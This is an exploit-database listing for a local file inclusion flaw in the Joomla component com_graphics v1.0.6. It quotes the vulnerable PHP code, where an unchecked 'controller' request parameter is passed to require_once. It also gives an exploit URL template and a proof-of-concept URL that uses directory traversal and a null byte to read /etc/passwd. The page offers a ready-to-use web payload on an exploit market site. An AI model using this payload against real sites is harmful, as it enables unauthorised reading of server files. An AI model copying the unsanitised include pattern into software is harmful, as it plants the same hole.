[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Joomla Component graphics com_graphics v1.0.6 LFI Vulnerability

Author
wishnusakti
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-12031
Category
web applications
Date add
27-04-2010
Platform
php
===============================================================
Joomla Component graphics com_graphics v1.0.6 LFI Vulnerability
===============================================================

================================================================================================
 
 Title    : Joomla Component graphics (com_graphics) v1.0.6 LFI Vulnerability
 Vendor   : http://htmlcoderhelper.com/
 Download : http://en.sourceforge.jp/frs/g_redir.php?m=jaist&f=%2Fjoomlagraphics%2Fcom_graphics.zip
 
 Date     : 27 April 2010 - GMT +07:00 Jakarta, Indonesia
 Author   : wishnusakti + inc0mp13te (HH)
 Contact  : evileyes60117[at]yahoo.com
 
 ================================================================================================
 
 [+] Vulnerable
 
     ./components/com_graphics/graphics.php
 
     // Require specific controller if requested
    if($controller = JRequest::getVar( 'controller' )) {
        require_once( JPATH_COMPONENT.DS.'controllers'.DS.$controller.'.php' );
    }
 
 
 [+] Exploit
 
     http://[site]/[path]/index.php?option=com_graphics&controller=[LFI]
 
 [+] PoC
 
     http://localhost/index.php?option=com_graphics&controller=../../../../../../../../../etc/passwd%00
 
 ================================================================================================



#  0day.today [2024-11-15]  #